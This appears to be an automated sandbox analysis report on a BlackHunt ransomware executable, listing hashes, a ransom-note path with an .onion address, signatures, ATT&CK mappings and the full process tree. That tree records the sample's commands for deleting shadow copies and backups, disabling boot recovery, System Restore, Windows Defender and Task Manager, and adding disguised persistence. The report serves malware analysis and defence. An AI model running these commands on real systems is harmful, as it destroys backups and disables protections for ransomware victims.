Analysis
  max time kernel:  114s
  max time network: 48s
  platform:         windows7_x64
  resource:         win7-20231215-en
  resource tags:    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  submitted:        19/01/2024, 01:19
Static task: static1

Behavioral task: behavioral1
  Sample:   ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Resource: win7-20231215-en

Behavioral task: behavioral2
  Sample:   ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Resource: win10v2004-20231215-en
General
  Target: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Size:   707KB
  MD5:    352a8dfb2827d4acb843a31d0d5cb6e9
  SHA1:   2b0c654ca2329c2c9b04fb39c7cd1f3a534956b1
  SHA256: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0
  SHA512: cc6a00c5114aec92ddd22aa2776b646919e9d7056d3dd2edbb81be819733b3c24505d94d7916abb70af7215acdb6b4394c485af1b55bf3cbe0893a78bcae2efb
  SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWgFh
Malware Config
  Extracted
    Path: C:\ProgramData\#BlackHunt_ReadMe.hta
    http-equiv="x-ua-compatible"
    http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 1 IoC)
  The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  PID 1596  fsutil.exe

  Key created      \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  (reg.exe)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  (reg.exe)

  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  (ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe)
Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  PID 2032  bcdedit.exe
  PID 1788  bcdedit.exe

Renames multiple (2344) files with added filename extension
  This suggests ransomware activity: the files on the system are being encrypted.

  PID 2348  wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"  (reg.exe)

  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  (ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe)

Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow 2  ip-api.com

Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 2664  schtasks.exe

Interacts with shadow copies (2 TTPs, 5 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  PID 1604  vssadmin.exe
  PID 3060  vssadmin.exe
  PID 2928  vssadmin.exe
  PID 1136  vssadmin.exe
  PID 2776  vssadmin.exe

Modifies registry class (8 IoCs)
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2  (reg.exe)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\  (reg.exe)
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon  (reg.exe)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  (reg.exe)
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2  (vssadmin.exe)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\  (vssadmin.exe)
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon  (reg.exe)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  (reg.exe)

Suspicious use of AdjustPrivilegeToken (13 IoCs)
  Token: SeDebugPrivilege            PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeRestorePrivilege          PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeBackupPrivilege           PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeTakeOwnershipPrivilege    PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeAuditPrivilege            PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeSecurityPrivilege         PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeIncBasePriorityPrivilege  PID 2448  ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Token: SeBackupPrivilege           PID 2628  vssvc.exe
  Token: SeRestorePrivilege          PID 2628  vssvc.exe
  Token: SeAuditPrivilege            PID 2628  vssvc.exe
  Token: SeBackupPrivilege           PID 2968  wbengine.exe
  Token: SeRestorePrivilege          PID 2968  wbengine.exe
  Token: SeSecurityPrivilege         PID 2968  wbengine.exe
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTP, 3 IoCs)
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System  (ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  (ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"  (ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe)

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"
  PID: 2448
  - UAC bypass
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    PID: 2140
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      PID: 3060

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID: 2776

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      PID: 2624
      - Modifies registry class

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    PID: 2716

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      PID: 2800
      - Modifies registry class

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    PID: 2752

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      PID: 3024
      - Adds Run key to start application

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    PID: 2608
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      PID: 3028
      - Modifies registry class

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    PID: 2596

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      PID: 2404

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    PID: 1896

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      PID: 1592

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    PID: 1968

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      PID: 596

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    PID: 2876

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      PID: 2072

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    PID: 3056

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      PID: 2300

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    PID: 3064

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID: 2620

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    PID: 2756

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      PID: 1752

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    PID: 2656

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      PID: 816

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    PID: 312

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
      PID: 2392

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    PID: 3008

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
      PID: 1180

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    PID: 2932

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      PID: 2968

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    PID: 2644

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    PID: 1940

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID: 2320

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    PID: 240

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
      PID: 2340

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    PID: 1372

    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID: 2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F2⤵PID:1624
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F3⤵
- Creates scheduled task(s)
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1820
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:824
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1536
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:784
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:400
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2128
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
- Modifies registry class
PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2380
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:332
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:904
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:600
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1072
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2180
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:2964
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2104
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1096
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (2)
    Disable or Modify Tools (2)
  Indicator Removal (3)
    File Deletion (3)
  Modify Registry (4)
Downloads
-
Filesize
12KB
MD5
684be959fa09bf2bdc6f0cbb1394cdbc
SHA1
9070000c6a794fcbe16961ed01f1b4753c9a9073
SHA256
dd9a74035a4184b3b93c17abec455be7bf01727f0c8c034dd4ea75b1df88402a
SHA512
b789dd25cbd7a8b8f87e070c38bbe3d2b16a9891a3dc421e81ee50a9fbf619307515930ad755a42cc090b90398bcc32e52f2bf0f82426845a604846dbeef2a81
-
Filesize
684B
MD5
83e16b7bc7fa812af57904c462c640bb
SHA1
1f3915789610dbf6364b71ef5317f1bc77cb21be
SHA256
da10973279672de583282d9d13efde36d8ab948ea2acb3854870aaa6177fd50f
SHA512
8d4f86b4121dd0a9b945c2c0366b2a0d417419e3f4d3e81fde8f1eb8544f3a10fd2882401ed6bef48e3735d474be3ed09698fc2866fb1f28f903f6fa176c4742
-
Filesize
1KB
MD5
11cb3e2653641d806d62ad1c05fbda82
SHA1
761cf4a1ee18e1f7f920f8f9ec1ccccd27a7f3b4
SHA256
3c3623e85bc5daac9dff486f8199b5418a4a6d34704c5f248dd2b6708b1bd562
SHA512
d437396ba8fe32b9f7fdd266926c951f9392fafa97c960c03576ee4bcaaaa745d316391a7bd125fcc799d6bd9fa610ba2f9d0ce4d6a165ee1e8dd520d10ea0f6